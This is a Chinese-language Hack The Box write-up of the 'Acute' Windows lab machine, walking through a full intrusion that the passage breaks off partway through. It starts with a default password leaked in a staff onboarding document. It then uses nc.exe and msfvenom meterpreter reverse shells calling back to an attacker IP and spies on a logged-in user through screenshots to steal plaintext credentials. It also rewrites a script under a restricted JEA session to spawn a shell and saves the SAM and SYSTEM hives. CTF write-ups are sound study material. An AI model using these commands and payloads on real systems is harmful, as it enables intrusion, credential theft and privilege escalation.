Acute-htb-writeup

0x00 靶场技能介绍

章节技能：网站信息分析（获取人员ID）、员工入职手册信息泄露（默认密码泄露）、cewl生成字典、exiftool分析文档、nc获取反弹shell、主机多人登录情况、msf监控截图、PS命令行中生成用户session进行读取flag、ps脚本分析、本地管理员转储SAM文件并破解、密码复用、bat脚本编辑、

参考链接：https://siunam321.github.io/ctf/hackthebox/Acute/

参考链接：https://0xdf.gitlab.io/2022/07/16/htb-acute.html

0x01 用户权限获取

1、靶机官方介绍

Acute 是一台硬 Windows 机器，以端口“443”上的网站启动。该网站的证书显示域名“atsserver.acute.local”。环顾该网站，提到了几名员工，利用这些信息，可以构建远程计算机上可能的用户列表。列举该网站会显示一个表格，其中包含有关公司新员工的程序。该表格显示所有帐户最初设置的默认密码。它还显示了“Windows PowerShell Web Access”(PSWA) 会话的链接。结合枚举过程中的所有可用信息，攻击者能够以“Acute-PC01”上的用户“edavies”进入 PowerShell 会话。然后，发现用户“edavies”也使用交互式会话登录。通过监视“edavie”的操作，可以检索“ATSSERVER”的“imonks”用户的明文密码。用户“imonks”在“ATSSERVER”上的“Just Enough Administration”（JEA）下运行，但即使使用有限的命令集，攻击者也能够修改“ATSSERVER”上的脚本，以使“edavies”成为本地管理员在“Acute-PC01”上。现在“edavies”是本地管理员，可以从系统中检索“HKLM\sam”和“HKLM\system”，以提取所有用户的密码哈希值。管理员的哈希结果是可破解的，并且明文密码被重新用于“ATSSERVER”上的“awallace”。用户“awallace”能够在用户“Lois”执行的目录中创建“BAT”脚本。 “Lois”有权将“imonks”添加到“site_admin”组，而该组又有权访问“Domain Admins”组。因此，将“imonks”添加到“site_admin”组后，他可以将自己添加到“Domain Admins”组并获取管理权限。

2、获取下靶机IP地址：10.10.11.145

3、探测下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.145 -oG allports -Pn
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 18:54 CST
Nmap scan report for 10.10.11.145
Host is up (1.9s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT    STATE SERVICE
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 34.02 seconds
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p443 -sC -sV 10.10.11.145                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 18:54 CST
Nmap scan report for 10.10.11.145
Host is up (0.31s latency).

PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2024-04-16T02:53:29+00:00; -8h03m11s from scanner time.
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
| tls-alpn: 
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -8h03m11s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.37 seconds

4、把上面端口扫描发现的域名地址，本地做一下绑定

1
2
3

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.145 atsserver.acute.local acute.local" | sudo tee -a /etc/hosts
10.10.11.145 atsserver.acute.local acute.local

5、开放访问下网站看看

https://10.10.11.145/
https://acute.local/

https://atsserver.acute.local/

6、经过阅读网站信息，发现了一个docx的文档材料，且在关于页面上还发现了一些人名的介绍

https://atsserver.acute.local/about.html

Who we work with
我们的合作伙伴

Acute Health work with healthcare providers, councils and NHS units in the UK, training over 10,000 nurses, managers and healthcare workers every year. Some of our more established team members have been included for multiple awards, these members include Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins. Each of whom have come away with special accolades from the Healthcare community.
Acute Health与英国的医疗服务提供者，议会和NHS单位合作，每年培训10，000多名护士，管理人员和医疗保健工作者。我们的一些更成熟的团队成员已被列入多个奖项，这些成员包括艾琳华莱士，夏洛特霍尔，埃文戴维斯，伊恩蒙克斯，约书亚摩根，和洛伊斯霍普金斯。他们中的每一个人都获得了医疗保健界的特别赞誉。

7、下面分析下这个docx文档内容

https://atsserver.acute.local/New_Starter_CheckList_v7.docx

这个文档可以看出来是一个新员工入职的介绍手册。

本大学的教职员介绍页可在以下网页找到：https://atsserver.acute.local/Staff
员工介绍门户网站可在这里找到：https://atsserver.acute.local/Staff/Induction

Arrange for the new starter to receive a demonstration on using IT tools which may include MUSE, myJob and Google accounts. Walk the new starter through the password change policy, they will need to change it from the default Password1!. Not all staff are changing these so please be sure to run through this.

安排新的启动器接收一个关于使用IT工具的演示，其中可能包括MUSE、myJob和谷歌帐户。让新的启动程序通过密码更改策略，他们将需要更改它从默认的密码1！。并不是所有的员工都在改变这些内容，所以请务必完成这些工作。

这个文档的这一段话泄露了账号的默认密码：Password1!

8、结合已有信息，我们获取到了一些疑似的账号和一个默认密码：

Aileen Wallace
Charlotte Hall
Evan Davies
Ieuan Monks
Joshua Morgan
Lois Hopkins

9、但是还是缺少一些信息，继续查看文档内容

Arrange initial probation meeting between Probationer, Head of Department and Probation Adviser.

Run through the new PSWA to highlight the restrictions set on the sessions named dc_manage.

The probation plan should be completed within a month of the start date and should include a requirement to register with LETs re: rate to gain within 3 months of starting. Fellowship of the Higher Education Academy (FHEA). 

安排申请人、部门主管和缓刑顾问的初步试用期会议。

运行新的PSWA以突出显示对名为dc_manage的会话设置的限制。

试用期计划应在开始日期后的一个月内完成，并应包括一个要求注册的要求：在开始后的3个月内获得的费率。美国高等教育学院奖学金（FHEA）。

https://atsserver.acute.local/Acute_Staff_Access

https://atsserver.acute.local/Acute_Staff_Access/en-US/logon.aspx?ReturnUrl=%2fAcute_Staff_Access

10、这里先使用下列工具，再生成一些用户姓名字典内容，在关于页面上。

┌──(kali㉿offsec)-[~/Desktop]
└─$ cewl https://atsserver.acute.local/about.html -w userlist.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ file userlist.txt                                            
userlist.txt: ASCII text
                              
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat userlist.txt                                             
and
Training
training
for
the
Health
healthcare
Acute
courses
Face
Care
are
File
directory
not
found
.....

11、再使用 exiftool 分析下文档材料

┌──(kali㉿offsec)-[~/Downloads]
└─$ exiftool ./New_Starter_CheckList_v7.docx                                      
ExifTool Version Number         : 12.70
File Name                       : New_Starter_CheckList_v7.docx
Directory                       : .
File Size                       : 35 kB
File Modification Date/Time     : 2024:04:17 04:49:43+08:00
File Access Date/Time           : 2024:04:17 04:50:11+08:00
File Inode Change Date/Time     : 2024:04:17 04:49:58+08:00
File Permissions                : -rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x079b7eb2
Zip Compressed Size             : 428
Zip Uncompressed Size           : 2527
Zip File Name                   : [Content_Types].xml
Creator                         : FCastle
Description                     : Created on Acute-PC01
Last Modified By                : Daniel
Revision Number                 : 8
Last Printed                    : 2021:01:04 15:54:00Z
Create Date                     : 2021:12:08 14:21:00Z
Modify Date                     : 2021:12:22 00:39:00Z
Template                        : Normal.dotm
Total Edit Time                 : 2.6 hours
Pages                           : 3
Words                           : 886
Characters                      : 5055
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 42
Paragraphs                      : 11
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 : 
Company                         : University of Marvel
Links Up To Date                : No
Characters With Spaces          : 5930
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 16.0000

12、那就开始使用burp开始枚举吧

13、到这里就发现了可以登录的账号密码了

Acute-PC01

EDavies

Password1!

14、登录进入后，发现是一个powershell的命令行界面，可以输入一些命令

https://atsserver.acute.local/Acute_Staff_Access/en-US/console.aspx

15、尝试是否可以反向通外网我的主机

PS C:\Users\edavies\Documents> 

ping 10.10.14.38 -w 4

Pinging 10.10.14.38 with 32 bytes of data:

Reply from 10.10.14.38: bytes=32 time=258ms TTL=62

Reply from 10.10.14.38: bytes=32 time=255ms TTL=62

Reply from 10.10.14.38: bytes=32 time=257ms TTL=62

Reply from 10.10.14.38: bytes=32 time=255ms TTL=62

Ping statistics for 10.10.14.38:

    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

    Minimum = 255ms, Maximum = 258ms, Average = 256ms

PS C:\Users\edavies\Documents> 

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo tcpdump -i tun0 icmp
[sudo] kali 的密码：
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
05:49:34.068118 IP atsserver.acute.local > 10.10.14.38: ICMP echo request, id 1000, seq 1, length 40
05:49:34.068188 IP 10.10.14.38 > atsserver.acute.local: ICMP echo reply, id 1000, seq 1, length 40
05:49:34.975338 IP atsserver.acute.local > 10.10.14.38: ICMP echo request, id 1000, seq 2, length 40
05:49:34.975377 IP 10.10.14.38 > atsserver.acute.local: ICMP echo reply, id 1000, seq 2, length 40
05:49:35.876647 IP atsserver.acute.local > 10.10.14.38: ICMP echo request, id 1000, seq 3, length 40
05:49:35.876686 IP 10.10.14.38 > atsserver.acute.local: ICMP echo reply, id 1000, seq 3, length 40
05:49:36.789916 IP atsserver.acute.local > 10.10.14.38: ICMP echo request, id 1000, seq 4, length 40
05:49:36.789965 IP 10.10.14.38 > atsserver.acute.local: ICMP echo reply, id 1000, seq 4, length 40

16、反向的连通性也是通的，那就构造反弹shell吧，这里尝试了几个powershell的反弹shell，发现均是报错，那就再继续看看

17、这里就开始上传一个nc进行nc的shell反弹了

PS C:\Users\edavies\Documents> 
ls
PS C:\Users\edavies\Documents> 
iwr -uri http://10.10.14.38/nc.exe -o C:\Users\edavies\Documents\nc.exe
PS C:\Users\edavies\Documents> 
ls
    Directory: C:\Users\edavies\Documents

Mode                 LastWriteTime         Length Name                                                                 

----                 -------------         ------ ----                                                                 

-a----         2024/4/16     15:01          68608 nc.exe 
PS C:\Users\edavies\Documents> 

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80                                                    
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.145 - - [17/Apr/2024 05:56:29] "GET /nc.exe HTTP/1.1" 200 -

./nc.exe -e powershell 10.10.14.38 443

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.145] 49835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\edavies\Documents> whoami
whoami
acute\edavies
PS C:\Users\edavies\Documents>

18、接下来就是常规的信息枚举了

PS C:\Users\edavies\Documents> net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
Natasha                  WDAGUtilityAccount       
The command completed with one or more errors.

PS C:\Users\edavies\Documents> ls C:/Users
ls C:/Users


    Directory: C:\Users


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        21/12/2021     13:01                administrator.ACUTE                                                  
d-----        22/12/2021     01:26                edavies                                                              
d-----        21/12/2021     22:50                jmorgan                                                              
d-----        19/11/2021     09:29                Natasha                                                              
d-r---        18/11/2020     23:43                Public                                                               


PS C:\Users\edavies\Documents> 


PS C:\Users\edavies\Documents> net user edavies
net user edavies
The user name could not be found.

More help is available by typing NET HELPMSG 2221.

PS C:\Users\edavies\Documents> net user jmorgan
net user jmorgan
The user name could not be found.

More help is available by typing NET HELPMSG 2221.

PS C:\Users\edavies\Documents> net user Natasha
net user Natasha
User name                    Natasha
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            21/12/2021 10:23:01
Password expires             Never
Password changeable          22/12/2021 10:23:01
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   21/12/2021 13:39:13

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *None                 
The command completed successfully.

PS C:\Users\edavies\Documents> 

通过这里，可能应该是需要横向到 Natasha 用户

PS C:\Users\edavies\Documents> cd C:/
cd C:/
PS C:\> ls
ls


    Directory: C:\


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        07/12/2019     09:14                PerfLogs                                                             
d-r---        06/12/2021     11:06                Program Files                                                        
d-r---        07/12/2021     12:43                Program Files (x86)                                                  
d-r---        21/12/2021     22:50                Users                                                                
d-----        31/01/2022     00:29                Utils                                                                
d-----        16/12/2021     01:23                Windows                 
  
PS C:\> cd Utils
cd Utils
PS C:\Utils> ls
ls
PS C:\Utils> ls -la
ls -la
Get-ChildItem : A parameter cannot be found that matches parameter name 'la'.
At line:1 char:4
+ ls -la
+    ~~~
    + CategoryInfo          : InvalidArgument: (:) [Get-ChildItem], ParameterBindingException
    + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
 
PS C:\Utils> dir -force
dir -force

    Directory: C:\Utils


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-h--        21/12/2021     18:41            148 desktop.ini 

PS C:\Utils> cat desktop.ini
cat desktop.ini
[.ShellClassInfo]
InfoTip=Directory for Testing Files without Defender
PS C:\Utils> 

用于在没有Defender的情况下测试文件的目录

根据提示，可以知道这个目录不会被杀软给杀掉

PS C:\Utils> net time /domain
net time /domain
The service has not been started.

More help is available by typing NET HELPMSG 2184.

PS C:\Utils> systeminfo
systeminfo
ERROR: Access denied
PS C:\Utils>

看来当前用户的权限还是非常低的啊

PS C:\Utils> netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       616
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       2004
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       560
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       436
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49693          0.0.0.0:0              LISTENING       620
  TCP    172.16.22.2:139        0.0.0.0:0              LISTENING       4
  TCP    172.16.22.2:5985       172.16.22.1:63119      ESTABLISHED     4
  TCP    172.16.22.2:5985       172.16.22.1:63160      ESTABLISHED     4
  TCP    172.16.22.2:60223      10.10.14.38:443        ESTABLISHED     2768
  TCP    172.16.22.2:60376      172.16.22.1:5985       TIME_WAIT       0
  TCP    [::]:135               [::]:0                 LISTENING       884
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:7680              [::]:0                 LISTENING       2004
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       632
  TCP    [::]:49665             [::]:0                 LISTENING       560
  TCP    [::]:49666             [::]:0                 LISTENING       672
  TCP    [::]:49668             [::]:0                 LISTENING       436
  TCP    [::]:49670             [::]:0                 LISTENING       632
  TCP    [::]:49693             [::]:0                 LISTENING       620
  UDP    0.0.0.0:123            *:*                                    956
  UDP    0.0.0.0:500            *:*                                    436
  UDP    0.0.0.0:4500           *:*                                    436
  UDP    0.0.0.0:5050           *:*                                    616
  UDP    0.0.0.0:5353           *:*                                    1132
  UDP    0.0.0.0:5353           *:*                                    896
  UDP    0.0.0.0:5353           *:*                                    896
  UDP    0.0.0.0:5355           *:*                                    1132
  UDP    0.0.0.0:50837          *:*                                    1132
  UDP    127.0.0.1:1900         *:*                                    4980
  UDP    127.0.0.1:52794        *:*                                    632
  UDP    127.0.0.1:52863        *:*                                    436
  UDP    127.0.0.1:57074        *:*                                    1456
  UDP    127.0.0.1:58361        *:*                                    4980
  UDP    127.0.0.1:62516        *:*                                    1132
  UDP    172.16.22.2:137        *:*                                    4
  UDP    172.16.22.2:138        *:*                                    4
  UDP    172.16.22.2:1900       *:*                                    4980
  UDP    172.16.22.2:58360      *:*                                    4980
  UDP    [::]:123               *:*                                    956
  UDP    [::]:500               *:*                                    436
  UDP    [::]:4500              *:*                                    436
  UDP    [::]:5353              *:*                                    896
  UDP    [::]:5353              *:*                                    1132
  UDP    [::]:5355              *:*                                    1132
  UDP    [::]:50837             *:*                                    1132
  UDP    [::1]:1900             *:*                                    4980
  UDP    [::1]:58359            *:*                                    4980
  UDP    [fe80::9513:4361:23ec:64fd%14]:1900  *:*                                    4980
  UDP    [fe80::9513:4361:23ec:64fd%14]:58358  *:*                                    4980
PS C:\Utils> 

一般到这个时候，如果是Linux的话，我就该上pspy了，监控整体的所有玩家的进程，看看能发现点啥不了。。

winPEASx64.exe

iwr -uri http://10.10.14.38/winPEASx64.exe -o C:\Utils\winPEASx64.exe

PS C:\Utils> iwr -uri http://10.10.14.38/winPEASx64.exe -o C:\Utils\winPEASx64.exe
iwr -uri http://10.10.14.38/winPEASx64.exe -o C:\Utils\winPEASx64.exe
PS C:\Utils> 

PS C:\Utils> ./winPEASx64.exe
./winPEASx64.exe

����������͹ RDP Sessions
    SessID    pSessionName   pUserName      pDomainName              State     SourceIP
    1         Console        edavies        ACUTE                    Active    

这里显示当前用户正在RDP的方式登录中

C:\Users\edavies\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\2.0.0.0\passwords.txt

19、发现是一个密码清单，差点把我的UI界面给卡主，既然存在另一个人登录，呢就上MSF进行监控把，这里是根据演练报告看的

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=53 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200774 bytes
Final size of exe file: 207360 bytes
Saved as: shell.exe

iwr -uri http://10.10.14.38/shell.exe -o C:\Utils\shell.exe

PS C:\Utils> iwr -uri http://10.10.14.38/shell.exe -o C:\Utils\shell.exe
iwr -uri http://10.10.14.38/shell.exe -o C:\Utils\shell.exe
PS C:\Utils> ./shell.exe
./shell.exe
PS C:\Utils> 


┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.145 - - [17/Apr/2024 06:39:41] "GET /shell.exe HTTP/1.1" 200 -


┌──(kali㉿offsec)-[~/Desktop]
└─$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.38
LHOST => 10.10.14.38
msf6 exploit(multi/handler) > set LPORT 53
LPORT => 53
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.38:53 
[*] Sending stage (200774 bytes) to 10.10.11.145
[*] Meterpreter session 1 opened (10.10.14.38:53 -> 10.10.11.145:49865) at 2024-04-17 06:40:16 +0800

20、开始进行截图

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/manage/migrate
msf6 post(windows/manage/migrate) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/migrate) > run

[*] Running module against ACUTE-PC01
[*] Current server process: shell.exe (5392)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The system cannot find the file specified.
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:176:in `execute'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:111:in `create_temp_proc'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:64:in `run'
[*] Post module execution completed
msf6 post(windows/manage/migrate) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > screenshot
Screenshot saved to: /home/kali/Desktop/CYEgRIyy.jpeg
meterpreter >

21、到这里开始不断的截图监控，在截图中，发现了一个密码信息

meterpreter > screenshot
Screenshot saved to: /home/kali/Desktop/LISdMsyZ.jpeg
meterpreter > screenshot
Screenshot saved to: /home/kali/Desktop/qoiqfcTA.jpeg
meterpreter >

enter-pssession -computername atsserver
enter-pssession -computername atsserver
$passwd = ConvertTo-SecureString "w3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks",$passwd)
Enter-PSSession -ComputerName ATSSERVER -Credential $cred
Enter-PSSession -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

22、我们可以以域用户身份在域控制器上执行 PowerShell 命令imonks，而不是以域用户身份启动与域控制器的交互式会话：Invoke-Commandimonks

PS C:\Utils> $pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
PS C:\Utils> Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
acute\imonks
PS C:\Utils>

23、这足以阅读user.txt：

Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
41ac4e3c46c2ce5c32eaa077827a887f
PS C:\Utils>

0x02 系统权限获取

24、除了之外user.txt，imonk 的桌面上还有另一个文件：

PS C:\Utils> Invoke-Command -ScriptBlock { ls ..\desktop } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ls ..\desktop } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred


    Directory: C:\Users\imonks\desktop


Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
-ar---        16/04/2024     13:33             34 user.txt                           ATSSERVER                         
-a----        11/01/2022     18:04            602 wm.ps1                             ATSSERVER                         


PS C:\Utils> 

PS C:\Utils> Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'

$passwd = $securepasswd | ConvertTo-SecureString

$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)

Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds

PS C:\Utils> 


PS C:\Utils> net localgroup Administrators
net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\jmorgan
Administrator
The command completed successfully.

PS C:\Utils>

25、修改脚本，我可以访问Get-Content( cat) 和Set-Content( sc)，因此我可以相对轻松地创建新脚本。我可以让它r.exe再次调用（因为我在已经打开的同一个盒子上执行），但我不想退出 PowerShell 会话来启动新的侦听器。我将上传nc64.exe并C:\utils让脚本调用：

PS C:\Utils> Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc.exe -e cmd 10.10.14.38 4444') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc.exe -e cmd 10.10.14.38 4444') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
PS C:\Utils> Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {C:\utils\nc.exe -e cmd 10.10.14.38 4444} -ComputerName Acute-PC01 -Credential $creds

PS C:\Utils> Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
The term 'C:\utils\nc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (C:\utils\nc.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    + PSComputerName        : ATSSERVER
 
PS C:\Utils> ls
ls


    Directory: C:\Utils


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        16/04/2024     15:17         770279 PowerView.ps1                                                        
-a----        16/04/2024     15:49         207360 shell.exe                                                            
-a----        16/04/2024     15:28        2387456 winPEASx64.exe                                                       


PS C:\Utils>

26、那这里上传一下吧

PS C:\Utils> iwr -uri http://10.10.14.38/nc.exe -o C:\Utils\nc.exe
iwr -uri http://10.10.14.38/nc.exe -o C:\Utils\nc.exe
PS C:\Utils> Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred


┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.145] 49842
Microsoft Windows [Version 10.0.19044.1466]
(c) Microsoft Corporation. All rights reserved.

C:\Users\jmorgan\Documents>whoami
whoami
acute\jmorgan

C:\Users\jmorgan\Documents>

27、获取密码，转储sam，作为 Acute-PC01 上的本地管理员，jmorgan 可以创建注册表配置单元的备份：

C:\Users\jmorgan\Documents>cd C:/
cd C:/

C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\> ls
ls


    Directory: C:\


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        07/12/2019     09:14                PerfLogs                                                             
d-r---        06/12/2021     11:06                Program Files                                                        
d-r---        07/12/2021     12:43                Program Files (x86)                                                  
d-r---        21/12/2021     22:50                Users                                                                
d-----        16/04/2024     15:49                Utils                                                                
d-----        16/12/2021     01:23                Windows                                                              


PS C:\> cd Utils
cd Utils
PS C:\Utils> ls
ls


    Directory: C:\Utils


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        16/04/2024     16:33          68608 nc.exe                                                               
-a----        16/04/2024     15:17         770279 PowerView.ps1                                                        
-a----        16/04/2024     15:49         207360 shell.exe                                                            
-a----        16/04/2024     15:28        2387456 winPEASx64.exe                                                       


PS C:\Utils> 



reg save HKLM\sam sam.bak

reg save HKLM\system sys.bak

PS C:\Utils> reg save HKLM\sam sam.bak
reg save HKLM\sam sam.bak
The operation completed successfully.
PS C:\Utils> reg save HKLM\system sys.bak
reg save HKLM\system sys.bak
